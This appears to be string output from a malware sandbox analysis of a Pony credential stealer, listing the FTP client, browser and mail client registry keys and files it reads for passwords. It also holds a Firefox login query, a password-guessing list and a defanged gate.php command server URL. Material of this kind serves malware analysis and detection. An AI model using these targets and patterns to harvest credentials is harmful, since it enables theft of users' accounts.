Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
\sm.dat
\Sites.dat
\Quick.dat
\History.dat
\sitemanager.xml
\recentservers.xml
\filezilla.xml
Port
Server.Host
Server.User
Server.Pass
Server.Port
Last Server Pass
Last Server Port
FTP Navigator
FTP Commander
ftplist.txt
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
addrbk.dat
quick.dat
\TurboFTP
Software\TurboFTP
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
PasswordType
Login
FtpSite.xml
\sites.xml
\FTPRush
RushSite.xml
FtpPort
Software\Cryer\WebSitePublisher
bitkinex.ds
\drives.js
"password" : "
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpServer
FtpUserName
FtpPassword
_FtpPassword
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
ftplast.osd
\SharedSettings.ccs
\SharedSettings_1_0_5.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.sqlite
leapftp
unleap.exe
sites.dat
sites.ini
\LeapWare\LeapFTP
PortNumber
\32BitFtp.ini
NDSites.ini
PassWord
Software\South River Technologies\WebDrive\Connections
FTP CONTROL
FTPCON
hXXp://
hXXps://
PTF://
opera
wand.dat
_Software\Opera Software
Opera.HTML\shell\open\command
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
wiseftpsrvs.ini
wisePTF.ini
FTPVoyager.ftp
FTPVoyager.qc
\RhinoSoft.com
nss3.dll
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
mozsqlite3.dll
profiles.ini
PathToExe
prefs.js
signons.sqlite
signons.txt
signons2.txt
signons3.txt
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
Firefox
\Mozilla\Firefox\
Software\Mozilla
fireFTPsites.dat
SeaMonkey
\Mozilla\SeaMonkey\
Mozilla
\Mozilla\Profiles\
Software\LeechFTP
bookmark.dat
SiteInfo.QFP
WinFTP
sites.db
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
servers.xml
\FTPGetter
ESTdb2.dat
QData.dat
\Estsoft\ALFTP
MS IE FTP Passwords
SiteServer %d\Host
SiteServer %d\WebUrl
SiteServer %d\Remote Directory
SiteServer %d-User
SiteServer %d-User PW
%s\Keychain
SiteServer %d\SFTP
DeluxeFTP
sites.xml
Web Data
Login Data
SQLite format 3
logins
origin_url
password_value
\Google\Chrome
\ChromePlus
Software\ChromePlus
\Nichrome
Staff-FTP
SM.arch
FreshFTP
BlazeFtp
site.dat
LastPassword
LastPort
Software\FlashPeak\BlazeFtp\Settings
\BlazeFtp
FTP  .Link\shell\open\command
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
password 51:b:
FTP Now
FTPNow
SOFTWARE\Robo-FTP 3.7\Scripts
SOFTWARE\Robo-FTP 3.7\FTPServers
FTP Count
FTP File%d
2.5.29.37
Software\LinasFTP\Site Manager
.duck
user.config
NppFTP.xml
FTP destination server
FTP destination user
FTP destination password
FTP destination port
FTP destination catalog
FTP profiles
FTPShell
ftpshell.fsi
Software\MAS-Soft\FTPInfo\Setup
\FTPInfo
ServerList.xml
ftpsite.ini
FTPList.db
\MapleStudio\ChromePlus
Software\Nico Mak Computing\WinZip\FTP
My FTP
project.ini
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
NovaFTP.db
\INSoftware\NovaFTP
.oeaccount
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Software\Microsoft\Windows Mail
Mailbox.ini
\PocoSystem.ini
accounts.ini
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
account.cfg
account.cfn
Dir #%d
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTP Password
SMTP Password
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
inetcomm server passwords
outlook account manager passwords
STATUS-IMPORT-OK
%d.bat
ShellExecuteA
shell32.dll
;3 #>6.&
'2, / 0&7!4-)1#
GetWindowsDirectoryA
user32.dll
RegOpenKeyExA
RegCloseKey
RegOpenKeyA
RegEnumKeyExA
RegCreateKeyA
InternetCrackUrlA
InternetCreateUrlA
wininet.dll
shlwapi.dll
wsock32.dll
userenv.dll
2hXXp://VVV.facebook.com/
xthpt/:w/wwf.cabeoo.koc/m
p.exe_1536_rwx_00400000_00016000:.text
`.data
password
12345678
password1
monkey
1234567
123456789
7777777
asshole
mickey
passw0rd
smokey
hockey
11111111
windows
1234567890
hXXp://bigbone10.info/pony/gate.php
hXXp://bigbone10.info:8080/pony/gate.php
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
kernel32.dll
netapi32.dll
ole32.dll
advapi32.dll
CryptGetUserKey
CryptExportKey
CryptDestroyKey
crypt32.dll
CertOpenSystemStoreA
CertEnumCertificatesInStore
CertCloseStore
CryptAcquireCertificatePrivateKey
msi.dll
pstorec.dll
^shell32.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
explorer.exe
POST %s HTTP/1.0
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
{X-X-X-XX-XXXXXX}
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
Password
wcx_PTF.ini
FtpIniName
Software\Ghisler\Windows Commander
\Ipswitch\WS_FTP
\win.ini
WS_FTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
\sm.dat
\Sites.dat
\Quick.dat
\History.dat
\sitemanager.xml
\recentservers.xml
\filezilla.xml
Port
Server.Host
Server.User
Server.Pass
Server.Port
Last Server Pass
Last Server Port
FTP Navigator
FTP Commander
ftplist.txt
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
addrbk.dat
quick.dat
\TurboFTP
Software\TurboFTP
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
PasswordType
Login
FtpSite.xml
\sites.xml
\FTPRush
RushSite.xml
FtpPort
Software\Cryer\WebSitePublisher
bitkinex.ds
\drives.js
"password" : "
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpServer
FtpUserName
FtpPassword
_FtpPassword
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
ftplast.osd
\SharedSettings.ccs
\SharedSettings_1_0_5.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.sqlite
leapftp
unleap.exe
sites.dat
sites.ini
\LeapWare\LeapFTP
PortNumber
\32BitFtp.ini
NDSites.ini
PassWord
Software\South River Technologies\WebDrive\Connections
FTP CONTROL
FTPCON
hXXp://
hXXps://
PTF://
opera
wand.dat
_Software\Opera Software
Opera.HTML\shell\open\command
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
wiseftpsrvs.ini
wisePTF.ini
FTPVoyager.ftp
FTPVoyager.qc
\RhinoSoft.com
nss3.dll
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
mozsqlite3.dll
profiles.ini
PathToExe
prefs.js
signons.sqlite
signons.txt
signons2.txt
signons3.txt
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
Firefox
\Mozilla\Firefox\
Software\Mozilla
fireFTPsites.dat
SeaMonkey
\Mozilla\SeaMonkey\
Mozilla
\Mozilla\Profiles\
Software\LeechFTP
bookmark.dat
SiteInfo.QFP
WinFTP
sites.db
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
servers.xml
\FTPGetter
ESTdb2.dat
QData.dat
\Estsoft\ALFTP
MS IE FTP Passwords
SiteServer %d\Host
SiteServer %d\WebUrl
SiteServer %d\Remote Directory
SiteServer %d-User
SiteServer %d-User PW
%s\Keychain
SiteServer %d\SFTP
DeluxeFTP
sites.xml
Web Data
Login Data
SQLite format 3
logins
origin_url
password_value
\Google\Chrome
\ChromePlus
Software\ChromePlus
\Nichrome
Staff-FTP
SM.arch
FreshFTP
BlazeFtp
site.dat
LastPassword
LastPort
Software\FlashPeak\BlazeFtp\Settings
\BlazeFtp
FTP  .Link\shell\open\command
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
password 51:b:
FTP Now
FTPNow
SOFTWARE\Robo-FTP 3.7\Scripts
SOFTWARE\Robo-FTP 3.7\FTPServers
FTP Count
FTP File%d
2.5.29.37
Software\LinasFTP\Site Manager
.duck
user.config
NppFTP.xml
FTP destination server
FTP destination user
FTP destination password
FTP destination port
FTP destination catalog
FTP profiles
FTPShell
ftpshell.fsi
Software\MAS-Soft\FTPInfo\Setup
\FTPInfo
ServerList.xml
ftpsite.ini
FTPList.db
\MapleStudio\ChromePlus
Software\Nico Mak Computing\WinZip\FTP
My FTP
project.ini
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
NovaFTP.db
\INSoftware\NovaFTP
.oeaccount
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Software\Microsoft\Windows Mail
Mailbox.ini
\PocoSystem.ini
accounts.ini
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
account.cfg
account.cfn
Dir #%d
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTP Password
SMTP Password
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
inetcomm server passwords
outlook account manager passwords
STATUS-IMPORT-OK
%d.bat
ShellExecuteA
shell32.dll
;3 #>6.&
'2, / 0&7!4-)1#
GetWindowsDirectoryA
user32.dll
RegOpenKeyExA
RegCloseKey
RegOpenKeyA
RegEnumKeyExA
RegCreateKeyA
InternetCrackUrlA
InternetCreateUrlA
wininet.dll
shlwapi.dll
wsock32.dll
userenv.dll
2hXXp://VVV.facebook.com/
xthpt/:w/wwf.cabeoo.koc/m
3Q3b3r3>

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps